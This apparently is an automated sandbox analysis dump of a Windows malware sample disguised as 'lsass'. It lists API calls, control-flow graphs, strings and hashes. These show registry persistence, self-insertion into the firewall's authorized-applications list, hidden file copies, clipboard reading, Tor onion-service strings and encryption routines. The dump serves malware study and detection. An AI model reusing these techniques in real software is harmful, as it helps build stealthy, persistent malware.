              control_flow_graph 1360 782d0f-782d25 1362 782d2b-782d40 Sleep 1360->1362 1363 78384d-783883 Sleep call 780140 RegOpenKeyExA 1360->1363 1364 782d4a-782d56 1362->1364 1373 7839b8-7839ee Sleep call 780140 RegOpenKeyExA 1363->1373 1374 783889-7838de call 780140 RegSetValueExA call 780140 RegOpenKeyExA 1363->1374 1366 7835bb-783688 Sleep memset ExpandEnvironmentStringsW rand * 3 wsprintfW * 2 CreateDirectoryW 1364->1366 1367 782d5c-782d76 FindWindowA 1364->1367 1369 783848 1366->1369 1370 78368e-7836b1 Sleep CopyFileW 1366->1370 1371 782d7c-782db7 DeleteFileA Sleep DeleteFileA MoveFileW 1367->1371 1372 783477-783484 PathFileExistsW 1367->1372 1369->1363 1370->1369 1375 7836b7-783723 Sleep wsprintfW SetFileAttributesW * 2 RegOpenKeyExW 1370->1375 1376 782dc8-782dd2 1371->1376 1379 78348a-78349f DeleteFileA 1372->1379 1380 7835a7-7835b6 1372->1380 1392 783b51-783b87 Sleep call 780140 RegOpenKeyExA 1373->1392 1393 7839f4-783b4b call 780140 * 7 RegSetValueExA * 7 RegCloseKey 1373->1393 1410 7838e0-78390b call 780140 RegCreateKeyExA 1374->1410 1411 783911-78393c call 780140 RegOpenKeyExA 1374->1411 1381 783765-783785 RegOpenKeyExW 1375->1381 1382 783725-78375f wcslen RegSetValueExW RegCloseKey 1375->1382 1384 782dd4-782e15 Sleep MoveFileW * 2 Sleep DeleteFileA 1376->1384 1385 782e17-782e9b Sleep DeleteFileW Sleep CopyFileA MoveFileW Sleep DeleteFileW InternetOpenA DeleteFileW 1376->1385 1387 7834b0-7834ba 1379->1387 1380->1364 1389 7837c7-7837e7 RegOpenKeyExW 1381->1389 1390 783787-7837c1 wcslen RegSetValueExW RegCloseKey 1381->1390 1382->1381 1384->1376 1394 782f8e-78302b Sleep DeleteFileW InternetCloseHandle DeleteFileA CopyFileA MoveFileW CloseWindow MoveFileA 1385->1394 1395 782ea1-782f0f MoveFileW Sleep DeleteFileW Sleep DeleteFileW InternetOpenUrlA Sleep 1385->1395 1396 7834d9-7834fe Sleep FindWindowA 1387->1396 1397 7834bc-7834d7 MoveFileW DeleteFileA 1387->1397 1401 783829-78383e call 780080 1389->1401 1402 7837e9-783823 wcslen RegSetValueExW RegCloseKey 1389->1402 1390->1389 1422 783cea-783d2f Sleep CreateThread Sleep CreateThread Sleep 1392->1422 1423 783b8d-783ce4 call 780140 * 7 RegSetValueExA * 7 RegCloseKey 1392->1423 1393->1392 1408 783031-78308f MoveFileW Sleep MoveFileW FindWindowA InternetOpenA 1394->1408 1409 783285-78328f 1394->1409 1403 782f11-782f1b 1395->1403 1404 782f76-782f88 InternetCloseHandle DeleteFileW 1395->1404 1406 783500-78355d DeleteFileA SetForegroundWindow SetFocus DeleteFileW MoveFileW Sleep CloseWindow Sleep 1396->1406 1407 783563-78356d 1396->1407 1397->1387 1401->1369 1439 783840-783842 ExitProcess 1401->1439 1402->1401 1414 782f2c-782f36 1403->1414 1404->1394 1406->1407 1417 78357e-783588 1407->1417 1418 78313f-783170 InternetCloseHandle CopyFileA Sleep 1408->1418 1419 783095-7830d7 Sleep MoveFileW InternetOpenUrlA 1408->1419 1415 783299-7832a5 1409->1415 1410->1411 1455 7839ab-7839b2 RegCloseKey 1411->1455 1456 78393e-7839a5 call 780140 * 2 RegSetValueExA * 2 RegCloseKey 1411->1456 1414->1404 1428 782f38-782f74 DeleteFileW Sleep MoveFileW Sleep DeleteFileA 1414->1428 1425 783317-783324 PathFileExistsA 1415->1425 1426 7832a7-7832c1 FindWindowA 1415->1426 1417->1380 1430 78358a-7835a5 DeleteFileW MoveFileW 1417->1430 1418->1409 1420 783176-7831d8 MoveFileA ShowWindow SetForegroundWindow DeleteFileA Sleep InternetOpenA 1418->1420 1431 7830d9-783121 CopyFileA Sleep DeleteFileA MoveFileW Sleep DeleteFileW 1419->1431 1432 783127-783139 InternetCloseHandle Sleep 1419->1432 1433 783278-78327f InternetCloseHandle 1420->1433 1434 7831de-783205 InternetOpenUrlA 1420->1434 1435 783d35-783d3c 1422->1435 1423->1422 1440 783362-78337c FindWindowA 1425->1440 1441 783326-78335c DeleteFileA Sleep DeleteFileW Sleep MoveFileW 1425->1441 1437 7832c3-78330f DeleteFileA MoveFileW Sleep CopyFileA Sleep 1426->1437 1438 783315 1426->1438 1428->1414 1430->1417 1431->1432 1432->1418 1433->1409 1447 78324a-783272 InternetCloseHandle Sleep DeleteFileA Sleep 1434->1447 1448 783207-783244 CopyFileA Sleep MoveFileW Sleep DeleteFileW 1434->1448 1449 783d42-783d57 Sleep 1435->1449 1450 783f03-783f0a 1435->1450 1437->1438 1438->1415 1452 783412-78341c 1440->1452 1453 783382-78340c Sleep DeleteFileA DeleteFileW SetForegroundWindow MoveFileW ShowWindow MoveFileW * 2 Sleep CloseWindow Sleep 1440->1453 1441->1440 1447->1433 1448->1447 1457 783d68-783d6f 1449->1457 1459 78342d-783437 1452->1459 1453->1452 1455->1373 1456->1455 1462 783e1e-783e5e Sleep ??2@YAPAXI@Z call 77eb80 1457->1462 1463 783d75-783d8a Sleep 1457->1463 1459->1372 1465 783439-783475 Sleep DeleteFileW DeleteFileA MoveFileW DeleteFileW 1459->1465 1483 783ef3-783efe Sleep 1462->1483 1484 783e64-783e6e 1462->1484 1468 783d9b-783da2 1463->1468 1465->1459 1474 783e19 1468->1474 1475 783da4-783e03 Sleep wsprintfA call 780370 1468->1475 1474->1457 1490 783e14 1475->1490 1491 783e05-783e11 call 780410 1475->1491 1483->1435 1488 783e7f-783e86 1484->1488 1493 783ee8-783eee call 77eec0 1488->1493 1494 783e88-783ee6 Sleep wsprintfA call 7811e0 1488->1494 1490->1468 1491->1490 1493->1483 1494->1488
              APIs
              • Sleep.KERNEL32(000001F4), ref: 00782D30
              • FindWindowA.USER32(w4tw84thw4h8th8w4h8t,00000000), ref: 00782D63
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782D81
              • Sleep.KERNEL32(000007D0), ref: 00782D8C
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782D97
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4yw4t4tw4twyw4y), ref: 00782DA7
              • Sleep.KERNEL32(000007D0), ref: 00782DD9
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00782DE9
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00782DF9
              • Sleep.KERNEL32(00000FA0), ref: 00782E04
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782E0F
              • Sleep.KERNEL32(000003E8), ref: 00782E1C
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00782E27
              • Sleep.KERNEL32(00001770), ref: 00782E32
              • PathFileExistsW.SHLWAPI(w4tw4yw4yw4tw4t), ref: 0078347C
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 0078348F
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 007834C6
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007834D1
              • Sleep.KERNEL32(00001388), ref: 007834DE
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 007834EB
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00783505
              • SetForegroundWindow.USER32(?), ref: 00783512
              • SetFocus.USER32(?), ref: 0078351F
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 0078352A
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 0078353A
              • Sleep.KERNEL32(000000C8), ref: 00783545
              • CloseWindow.USER32(?), ref: 00783552
              • Sleep.KERNEL32(00000FA0), ref: 0078355D
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 0078358F
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 0078359F
              • Sleep.KERNEL32(000001F4), ref: 007835C0
              • memset.MSVCRT ref: 007835D4
              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 007835F6
              • rand.MSVCRT ref: 007835FC
              • rand.MSVCRT ref: 00783610
              • rand.MSVCRT ref: 00783624
              • wsprintfW.USER32 ref: 0078364B
              • wsprintfW.USER32 ref: 0078366E
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00783680
              • Sleep.KERNEL32(000003E8), ref: 00783693
              • CopyFileW.KERNEL32(?,?,00000000), ref: 007836A9
              • Sleep.KERNEL32(000003E8), ref: 007836BC
              • wsprintfW.USER32 ref: 007836DC
              • SetFileAttributesW.KERNEL32(?,00000007), ref: 007836EE
              • SetFileAttributesW.KERNEL32(?,00000007), ref: 007836FD
              • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,000F003F,?), ref: 0078371B
              • wcslen.MSVCRT ref: 0078372C
              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000000A), ref: 00783852
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0078387B
              • RegSetValueExA.ADVAPI32(?,00000000,?,00000004,?,?,?,?,?,?,?,?,?,0000000A), ref: 007838AD
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 007838D6
              • RegCreateKeyExA.ADVAPI32(80000002,00000000,00020006,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0000000A), ref: 0078390B
              • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,00000000,000F003F,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 00783934
              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 00783977
              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,?,00000000,000F003F,?), ref: 00783998
              • RegCloseKey.ADVAPI32(?,?,?,?,00000000,000F003F,?), ref: 007839A5
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: File$Sleep$Delete$Move$OpenWindow$Valuerandwsprintf$AttributesCloseCreateFind$CopyDirectoryEnvironmentExistsExpandFocusForegroundPathStringsmemsetwcslen
              • String ID: e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4yw4t4tw4twyw4y
              • API String ID: 1434077179-1752865879
              • Opcode ID: f6d8c32754a935c13cebeedb8aaf7ae6cb92e142bfca79536c6deed6312bfc59
              • Instruction ID: b03b574f5a274e05d37661f0ca5cd485b1f74b41d56b0262b51a18ca52f19205
              • Opcode Fuzzy Hash: f6d8c32754a935c13cebeedb8aaf7ae6cb92e142bfca79536c6deed6312bfc59
              • Instruction Fuzzy Hash: 961119B0AC0658EFD714AB90DC4EBEC7AB1BB04B06F24D4C5E24A65191C7BC0AC4CF56
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1510 77cad0-77cbe5 call 783f50 call 772100 * 10 call 7734a0 1535 77d00c-77d03d call 783f80 1510->1535 1536 77cbeb-77cc1b call 773830 1510->1536 1541 77cc21-77cc3d 1536->1541 1542 77cffd-77d009 call 773410 1536->1542 1541->1542 1546 77cc43-77cc70 call 773830 1541->1546 1542->1535 1546->1542 1549 77cc76-77cc8a 1546->1549 1549->1542 1551 77cc90-77ccbe call 773830 1549->1551 1551->1542 1554 77ccc4-77ccf2 call 7730f0 1551->1554 1554->1542 1557 77ccf8-77cd1e call 773650 1554->1557 1557->1542 1560 77cd24-77cd50 call 784080 1557->1560 1564 77cd56-77cd63 1560->1564 1565 77cff2-77cff8 call 784030 1560->1565 1564->1565 1566 77cd69-77cda3 call 784170 call 773830 1564->1566 1565->1542 1572 77cfd5-77cfed call 784170 call 773410 1566->1572 1573 77cda9-77cde5 call 784170 call 773830 1566->1573 1573->1572 1582 77cdeb-77ce27 call 784170 call 773830 1573->1582 1582->1572 1587 77ce2d-77ce85 call 784170 call 773830 1582->1587 1587->1572 1593 77ce8b-77cecf call 784170 call 773830 1587->1593 1593->1572 1598 77ced5-77cf0b lstrlenA call 7730f0 1593->1598 1598->1572 1601 77cf11-77cf3b call 773040 1598->1601 1601->1572 1604 77cf41-77cf6b call 773040 1601->1604 1604->1572 1607 77cf6d-77cfd3 memmove 1604->1607 1607->1572
              APIs
                • Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F
              • _longjmp.LIBVCRUNTIMED ref: 0077CBD8
              • task.LIBCPMTD ref: 0077D02F
                • Part of subcall function 00773830: lstrlenA.KERNEL32(00000000), ref: 00773862
                • Part of subcall function 00773830: lstrlenA.KERNEL32(?), ref: 0077387E
              • lstrlenA.KERNEL32(?,?,00000014,00000020,?,?,?,?,?,?,?,?,00000000), ref: 0077CEF0
              • memmove.MSVCRT ref: 0077CFC0
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: lstrlen$memmove$_longjmptask
              • String ID: -----END MESSAGE-----$-----END RSA PUBLIC KEY-----$<$introduction-point $introduction-points-----BEGIN MESSAGE-----$ip-address $onion-key$onion-port $protocol-versions $secret-id-part $service-key
              • API String ID: 3796934367-2400399560
              • Opcode ID: 17a281289452b5d56a962dbb95684c49e64c91c2da0f4b92ea99cc6f563ea004
              • Instruction ID: 21b4e2222f945e2bff0938d5b3712b57e37d5c51c4e98a10c3b0f27a83d0d835
              • Opcode Fuzzy Hash: 17a281289452b5d56a962dbb95684c49e64c91c2da0f4b92ea99cc6f563ea004
              • Instruction Fuzzy Hash: 0BE17AF2A40318AADF24DB54DC46FEE7379AF48700F548198F6096B181EB75AB44CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memset.MSVCRT ref: 0078008E
              • memset.MSVCRT ref: 0078009E
              • CreateProcessW.KERNEL32(00000000,00780771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007800D7
              • Sleep.KERNEL32(000003E8), ref: 007800E7
              • Sleep.KERNEL32(000003E8), ref: 007800F6
              • ShellExecuteW.SHELL32(00000000,open,00780771,00000000,00000000,00000000), ref: 0078010D
              • Sleep.KERNEL32(000003E8), ref: 00780127
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: Sleep$memset$CreateExecuteProcessShell
              • String ID: $D$open
              • API String ID: 4117032385-2182757814
              • Opcode ID: 31607115a72eb64611de84d76b1892aa5f5e3be3afc3e2bc09d11c0bf9d47b8d
              • Instruction ID: dfe42f4833aafde24491d2900f67cc11e43382e9e973f4b1e396600b4c93806f
              • Opcode Fuzzy Hash: 31607115a72eb64611de84d76b1892aa5f5e3be3afc3e2bc09d11c0bf9d47b8d
              • Instruction Fuzzy Hash: 7E1142B1EC4308BBEB10DB90DD4AF9D7778AB14B01F204115F7096E1C0DAF96A04CBA9
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00774220: GetLastError.KERNEL32 ref: 00774264
                • Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 007742FE
                • Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 0077430E
                • Part of subcall function 00774220: GlobalFree.KERNEL32(00000000), ref: 0077431E
              • freeaddrinfo.WS2_32(?,00000004,00000009), ref: 00774C67
                • Part of subcall function 007749C0: socket.WS2_32(?,?,?), ref: 00774A1E
                • Part of subcall function 007749C0: connect.WS2_32(000000FF,?,?), ref: 00774A48
                • Part of subcall function 007749C0: freeaddrinfo.WS2_32(?), ref: 00774AA5
              Strings
              • , xrefs: 00774D6E
              • , xrefs: 00774B5D
              • CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s, xrefs: 00774F13
              • CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s, xrefs: 00774D61
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: FreeGlobal$freeaddrinfo$ErrorLastconnectsocket
              • String ID: $ $CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s$CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s
              • API String ID: 3188732148-200375032
              • Opcode ID: 2d4e10b69fe4da918ec2d470402993b9c2d76502b3604b64076edd609f85d58a
              • Instruction ID: 5c973d5e2323d22c337040c3ce83e3b5fc6784204237ff7d7a4c648a7ba4873a
              • Opcode Fuzzy Hash: 2d4e10b69fe4da918ec2d470402993b9c2d76502b3604b64076edd609f85d58a
              • Instruction Fuzzy Hash: B3F1C271A002689BDF28DB65DC45BFAB3B9AB44344F04C4D9B14DA7181DBB89F84CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 00781245
              • rand.MSVCRT ref: 0078126E
              • rand.MSVCRT ref: 00781282
              • wsprintfW.USER32 ref: 007812A9
                • Part of subcall function 00781130: CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 00781153
                • Part of subcall function 00781130: SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 0078116C
                • Part of subcall function 00781130: WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00781198
                • Part of subcall function 00781130: CloseHandle.KERNEL32(000000FF), ref: 007811CD
              • Sleep.KERNEL32(000003E8), ref: 007812ED
                • Part of subcall function 0077FE60: CryptImportKey.ADVAPI32(00000000,00785940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FE8A
                • Part of subcall function 0077FE60: CreateFileW.KERNEL32(00780750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FEAB
                • Part of subcall function 0077FE60: GetFileSize.KERNEL32(000000FF,00000000), ref: 0077FEC4
                • Part of subcall function 0077FE60: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 0077FEE5
                • Part of subcall function 0077FE60: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0077FF04
                • Part of subcall function 0077FE60: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 0077FF56
                • Part of subcall function 0077FE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0077FF8D
                • Part of subcall function 0077FE60: HeapAlloc.KERNEL32(00000000), ref: 0077FF94
              • Sleep.KERNEL32(000003E8), ref: 0078130E
                • Part of subcall function 00780080: memset.MSVCRT ref: 0078008E
                • Part of subcall function 00780080: memset.MSVCRT ref: 0078009E
                • Part of subcall function 00780080: CreateProcessW.KERNEL32(00000000,00780771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007800D7
                • Part of subcall function 00780080: Sleep.KERNEL32(000003E8), ref: 007800E7
              • DeleteFileW.KERNEL32(?), ref: 0078132C
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: File$Create$Sleep$CryptHeapProcessmemsetrand$AllocCloseDeleteHandleHashImportMappingPathPointerSizeTempViewWritewsprintf
              • String ID: %ls\%d%d.exe$>x
              • API String ID: 1034425663-2732872938
              • Opcode ID: 0ff99068beb328ab2a0e19d29f050f68ade358f90087370c936e2de331345a53
              • Instruction ID: af6f3e7c74ab54b60e8d65a7c87556d28c7163ebb25bade55ae481a616066364
              • Opcode Fuzzy Hash: 0ff99068beb328ab2a0e19d29f050f68ade358f90087370c936e2de331345a53
              • Instruction Fuzzy Hash: AD31C9B1A8011DDBCB14EB50DC89FEE7379BF44304F4085D8F50D96581EA789E418F65
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB
                • Part of subcall function 007770D0: lstrlenA.KERNEL32(0077DC70,?,0077DC70,?,00000040,00000000), ref: 007770DA
              • lstrlenA.KERNEL32(?), ref: 0077DD1F
              • memmove.MSVCRT ref: 0077DEB6
                • Part of subcall function 00777190: lstrlenA.KERNEL32(?,?,?,0077DC8D,?,?,?,00000040,00000000), ref: 00777198
              • memmove.MSVCRT ref: 0077E24B
              • memmove.MSVCRT ref: 0077E2B3
              • memmove.MSVCRT ref: 0077E2F7
              • PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 0077E333
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: memmove$lstrlen$CompletionCriticalEnterPostQueuedSectionStatus
              • String ID: $@
              • API String ID: 2473233352-1077428164
              • Opcode ID: fccd7a1aa340e2eba8e30a185715529edb3c199833ecc2316b0f9a6b2bbabb14
              • Instruction ID: 62f682654bcf0c3720862967e68679a7cf22b046e1e808d5697ecaac0fee4993
              • Opcode Fuzzy Hash: fccd7a1aa340e2eba8e30a185715529edb3c199833ecc2316b0f9a6b2bbabb14
              • Instruction Fuzzy Hash: 11225170B00229AFDF2ACB11D8A5AA9B77AAF54344F14C5E9D00D5B381DB7A9F85CF40
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • OpenClipboard.USER32(00000000), ref: 0077FCD8
              • GetClipboardData.USER32(00000001), ref: 0077FCE4
              • GlobalLock.KERNEL32(00000000), ref: 0077FCF7
              • GlobalUnlock.KERNEL32(00000000), ref: 0077FD0A
              • GetClipboardData.USER32(0000000D), ref: 0077FD1E
              • GlobalLock.KERNEL32(00000000), ref: 0077FD31
              • GlobalUnlock.KERNEL32(00000000), ref: 0077FD44
              • CloseClipboard.USER32 ref: 0077FD56
              • Sleep.KERNEL32(000000C8), ref: 0077FD61
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: ClipboardGlobal$DataLockUnlock$CloseOpenSleep
              • String ID:
              • API String ID: 4265195717-0
              • Opcode ID: 41c3d401f8912a578bee66352d2a205bcf12475677b3afe411e553c0019a549b
              • Instruction ID: 4c0599e80b11bfe6584a2d6ccb874e690690f89764556f28177e8130a9d43fab
              • Opcode Fuzzy Hash: 41c3d401f8912a578bee66352d2a205bcf12475677b3afe411e553c0019a549b
              • Instruction Fuzzy Hash: 36113CB8A40708EFDB10AFF0DA4CB8D7BB4BB04301F24C564E50A972A0DB7C9A84DB55
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • inet_ntop.WS2_32(00000002,?,?,00000080), ref: 007783E6
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_770000_lsass.jbxd
              Similarity
              • API ID: inet_ntop
              • String ID: p $r $r $s $<
              • API String ID: 448242623-3079122765
              • Opcode ID: 8c9c6af6f4c6f9b485a317a2c5cd88dc67981b1da1a87e5f3db10fc1020d5596
              • Instruction ID: 2b46be6109ac88aa28ad8a778e4b08ecf8d69cc437bea9d548e5af101ea14cba
              • Opcode Fuzzy Hash: 8c9c6af6f4c6f9b485a317a2c5cd88dc67981b1da1a87e5f3db10fc1020d5596
              • Instruction Fuzzy Hash: 9ED160719402699FDF64CBA0CC48FEEB7B9AF44340F1485D9E20DA6241DB789E84CF62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 00773330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00773370
                • Part of subcall function 00773330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 0077338E
                • Part of subcall function 00773330: Sleep.KERNEL32(000007D0), ref: 007733A2
              • memmove.MSVCRT ref: 0077B14F
              • memmove.MSVCRT ref: 0077B16D
              • memmove.MSVCRT ref: 0077B1A2
                • Part of subcall function 007723C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,0077B263,?,00000000,00000056,00000080), ref: 007723E2
              • memmove.MSVCRT ref: 0077B22A
              • memmove.MSVCRT ref: 0077B241
              • memmove.MSVCRT ref: 0077B2A7
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
              • Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
              • Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
